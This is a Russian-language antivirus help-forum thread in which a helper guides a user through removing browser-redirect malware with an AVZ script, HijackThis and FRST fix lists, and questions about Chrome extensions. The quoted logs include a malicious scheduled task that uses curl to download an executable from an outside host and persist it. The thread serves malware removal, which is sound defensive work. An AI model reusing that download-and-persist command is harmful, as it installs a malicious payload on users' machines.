valmlord 2 Опубликовано 23 июля, 2017 Share Опубликовано 23 июля, 2017 (изменено) Добрый времени суток! С недавнего времени столкнулся в браузере с проблемой перехода на один и тот же сайт на тему моды, хотя антивирус Касперского блокирует разные ссылки в разделе веб-антивируса. Пробовал разные программы для удаления вирусов но проблема не исчезла. Прикрепил логи. P.S.- Заранее благодарен! CollectionLog-2017.07.23-22.28.zip Изменено 23 июля, 2017 пользователем valmlord 1 Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 23 июля, 2017 Share Опубликовано 23 июля, 2017 Прикрепил логи. где? Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 23 июля, 2017 Автор Share Опубликовано 23 июля, 2017 Прошу прощения.) Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 23 июля, 2017 Share Опубликовано 23 июля, 2017 Здравствуйте!- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFileF('C:\Users\korsh\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteFileMask('C:\Users\korsh\AppData\Roaming\curl\', '*', true); DeleteDirectory('C:\Users\korsh\AppData\Roaming\curl\'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 24 июля, 2017 Автор Share Опубликовано 24 июля, 2017 (изменено) [KLAN-6563168774] Процедуру выполнил. Новые логи. Но по ссылке все равно переходит. CollectionLog-2017.07.24-10.21.zip Изменено 24 июля, 2017 пользователем valmlord Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 июля, 2017 Share Опубликовано 24 июля, 2017 "Пофиксите" в HijackThis: O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file) O8 - Extra context menu item: Закачать при помощи Download Master - (no file) O8 - Extra context menu item: Передать на удаленную закачку DM - (no file) O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file) O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task (Ready): MSI - C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\adobe_snr_patch_v2_0___.exe" (file missing) O22 - Task (Ready): curl - C:\Users\korsh\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\korsh\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task (Ready): curls - C:\Users\korsh\AppData\Roaming\curl\curl.exe (file missing) Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.Отметьте галочкой также "Shortcut.txt".Нажмите кнопку Scan.После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 24 июля, 2017 Автор Share Опубликовано 24 июля, 2017 Сделал. FRST.txt Shortcut.txt Addition.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 июля, 2017 Share Опубликовано 24 июля, 2017 Отключите до перезагрузки антивирус. Выделите следующий код:Start:: CreateRestorePoint: Task: {04FE8142-078C-4C8D-A6B3-E71B3AD58CC2} - System32\Tasks\curls => C:\Users\korsh\AppData\Roaming\curl\curl.exe <==== ATTENTION Task: {2DA78775-D5A1-4FF5-9F41-1002F45FB790} - System32\Tasks\S-1-5-21-622461763-1730611795-3261267339-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [2017-03-18] (Microsoft Corporation) Task: {54FD84DD-93B6-412C-8CE7-61652B16E327} - System32\Tasks\MSI => C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe 2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb2647fd6355e3a09 2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1ff9e8ccadfb791b 2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignf98c59fb8aa73d65 2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb0b5818e61bf0927 2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9446595e6997269d 2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign45f445e1b114190a 2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne9fa9aecd1457c7e 2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign98654afdbb435ff7 2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign2ffdbae189d060a6 2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign72fc4b4c331c5c09 2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign586c353c36e55591 2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f142479ecb18662 2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7dd8d17cce6f39d6 2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne844ae9662544afd 2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc21941d5bd6e16fa 2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncc347c9cda4ebc3c 2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign46fe240577c62dc2 2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign04e77205866ab10d 2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaae2bc5cb51a03ad 2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9ef3b70db1bad327 2017-07-10 20:27 - 2017-07-10 20:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc3e8eae2e0d34aae 2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign79a93fa63b208c2d 2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign260ff3c57ba639a0 2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignd594cc74dd597bec 2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaeb44e4012ba6c33 2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f4e20de6fe7515e 2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignefe9c21f5b7d0e3c 2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9c7a4c68c7345059 2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign705a1c5d19a57b0a 2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign6e0c021a84327464 2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfcd99e10f5556339 2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncb9814e63a9d1f48 2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign95ee08595d98b80d 2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign813e4e7fc63bf8db 2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7b834b74203ecab4 2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign5e26b5a05b6d84eb 2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign412988fc9fcf7c18 2017-06-30 12:21 - 2017-06-30 12:21 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna02dfb9b2cb3be5c 2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncd891ec1454d2864 2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1fcbc461bcfc12f4 2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfc08370a161c0e69 2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc019c40d13fd2614 2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna3617627162fbc7a 2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign3994bc82809fbda6 2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign8cfa1402eb65c4ba 2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign81d088a9745af97e 2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7c283eb03c9a70a8 2017-07-10 20:21 - 2017-07-15 23:19 - 0004910 _____ () C:\Program Files\Common Files\csdkConfiguratorLog.txt 2017-07-18 13:32 - 2017-07-18 20:20 - 0000033 _____ () C:\Users\korsh\AppData\Roaming\AdobeWLCMCache.dat 2017-06-30 11:19 - 2017-07-24 10:54 - 0000165 _____ () C:\Users\korsh\AppData\Roaming\sp_data.sys 2017-07-21 17:10 - 2017-07-21 17:10 - 0000032 RSHOT () C:\Users\korsh\AppData\Local\t80.dat 2017-06-30 01:59 - 2017-06-30 01:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. 1 1 Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 24 июля, 2017 Автор Share Опубликовано 24 июля, 2017 Готово. Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 июля, 2017 Share Опубликовано 24 июля, 2017 Свежие логи FRST сделайте и что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 24 июля, 2017 Автор Share Опубликовано 24 июля, 2017 Свежие логи. Но проблема не ушла,так и кидает на этот сайт. Addition.txt FRST.txt Shortcut.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 25 июля, 2017 Share Опубликовано 25 июля, 2017 1) Проблема только в Хроме? Проверьте в других браузерах. 2) Эти расширения все знакомы? CHR Extension: (Скачать музыку с Вконтакте (vk.com)) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-07-13]CHR Extension: (Диск Google) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-30]CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]CHR Extension: (Tab Resize - split screen layouts) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkpenclhmiealbebdopglffmfdiilejc [2017-06-30]CHR Extension: (YouTube) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-30]CHR Extension: (uDev - Web Developer Toolbar) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\deeboegbjcnfgidliakhpoapnpomphji [2017-06-30]CHR Extension: (Tampermonkey) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-30]CHR Extension: (Adobe Acrobat) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-07-11]CHR Extension: (Fontface Ninja) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\eljapbgkmlngdpckoiiibecpemleclhh [2017-06-30]CHR Extension: (AdBlock) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-20]CHR Extension: (Eye Dropper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmdcmlfkchdmnmnmheododdhjedfccka [2017-07-22]CHR Extension: (LiveReload) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jnihajbhpnppcggbcgedagnkighmdlei [2017-06-30]CHR Extension: (Speed Dial 2) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-06-30]CHR Extension: (Бесплатный прокси-сервер VPN Hotspot Shield — разблокировка сайтов) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-07-22]CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-30]CHR Extension: (Checker Plus for Gmail™) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeopbcgkkoapgobdbedcemjljbihmemj [2017-07-24]CHR Extension: (Visual Event) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbmmieigblcbldgdokdjpioljjninaim [2017-06-30]CHR Extension: (Evernote Web Clipper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2017-06-30]CHR Extension: (Gmail) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-30]CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14] Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 25 июля, 2017 Автор Share Опубликовано 25 июля, 2017 (изменено) В других браузерах вроде не переходит. CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30] CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14] Вот это не знаю. Изменено 25 июля, 2017 пользователем valmlord Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 25 июля, 2017 Share Опубликовано 25 июля, 2017 CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30] Вот это удалите через управление расширениями и проверьте проблему. Цитата Ссылка на сообщение Поделиться на другие сайты
valmlord 2 Опубликовано 25 июля, 2017 Автор Share Опубликовано 25 июля, 2017 (изменено) У Google chrome в расширениях нету его в списках. Можно папку с ним через проводник удалить? Жесть какая-то, первый раз сталкиваюсь с таким вирусом неудоляемым). Изменено 25 июля, 2017 пользователем valmlord Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.